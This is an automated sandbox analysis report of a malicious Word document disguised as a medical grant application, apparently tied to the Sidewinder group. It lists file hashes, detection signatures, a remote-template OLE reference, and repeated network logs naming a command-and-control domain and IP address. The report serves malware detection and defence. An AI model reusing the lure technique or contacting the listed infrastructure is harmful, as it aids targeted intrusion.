Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SLNA_Updated_Medical_Grant_Application(1).docx

Overview

General Information

Sample name:SLNA_Updated_Medical_Grant_Application(1).docx
Analysis ID:1574549
MD5:5a33bcadb199a553dd6ee2bdbdec4eea
SHA1:0f318222204f14982f1579aac204812a253ea49d
SHA256:8ae6cf2d0932782784084ff0e792a85146d5073115556e8d05a225e635ec96fa
Tags:aptdocxSidewinderuser-smica83
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Suricata IDS alerts for network traffic
Contains an external reference to another file
Microsoft Office drops suspicious files
Office drops RTF file
Office viewer loads remote template
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3432 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
_rels\document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x1f0:$olerel: relationships/oleObject
  • 0x209:$target1: Target="http
  • 0x25b:$mode: TargetMode="External

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3432, Protocol: tcp, SourceIp: 5.255.125.140, SourceIsIpv6: false, SourcePort: 443
Sigma detected: Modification of IE Registry Settings
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3432, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Sigma detected: Office Macro File Creation
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3432, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-13T12:10:43.753717+010020551291A Network Trojan was detected5.255.125.140443192.168.2.2249164TCP
2024-12-13T12:10:52.189469+010020551291A Network Trojan was detected5.255.125.140443192.168.2.2249168TCP
2024-12-13T12:11:04.002228+010020551291A Network Trojan was detected5.255.125.140443192.168.2.2249174TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-13T12:10:43.753705+010020550811Malware Command and Control Activity Detected192.168.2.22491645.255.125.140443TCP
2024-12-13T12:10:52.188852+010020550811Malware Command and Control Activity Detected192.168.2.22491685.255.125.140443TCP
2024-12-13T12:11:04.001903+010020550811Malware Command and Control Activity Detected192.168.2.22491745.255.125.140443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-13T12:10:43.753705+010020338581Malware Command and Control Activity Detected192.168.2.22491645.255.125.140443TCP
2024-12-13T12:10:52.188852+010020338581Malware Command and Control Activity Detected192.168.2.22491685.255.125.140443TCP
2024-12-13T12:11:04.001903+010020338581Malware Command and Control Activity Detected192.168.2.22491745.255.125.140443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficDNS query: name: defence-lk.military-bd.org
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
